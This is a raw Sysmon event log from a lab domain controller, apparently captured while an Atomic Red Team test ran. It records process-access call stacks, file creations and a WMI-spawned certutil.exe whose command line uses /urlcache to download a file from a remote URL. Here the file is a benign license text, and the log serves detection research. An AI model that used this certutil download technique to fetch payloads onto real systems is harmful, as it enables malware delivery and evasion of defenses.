21:50:42.819{896A638B-B432-605B-8F69-00000000AE01}7868ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Temp\foo.txtMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918106Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.818{896A638B-B432-605B-8F69-00000000AE01}7868ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.keyMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918105Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.773{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918104Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918103Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918102Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.720{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918101Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.720{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918100Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.707{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918099Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.707{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918098Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.684{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918097Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.684{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918096Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.684{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918095Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.682{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918094Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.682{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918093Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.676{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918092Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.676{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918091Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.676{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918090Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.675{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918089Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.675{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918088Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.675{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918087Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.675{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918086Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.674{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918085Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.667{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918084Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.667{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918083Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.663{896A638B-B432-605B-9069-00000000AE01}77367468C:\Windows\system32\conhost.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918082Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.655{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B432-605B-9069-00000000AE01}7736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918081Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.652{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918080Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918079Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918078Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918077Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918076Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.650{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918075Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.649{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005918074Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.649{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" /urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt c:\temp\foo.txtC:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000005918073Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 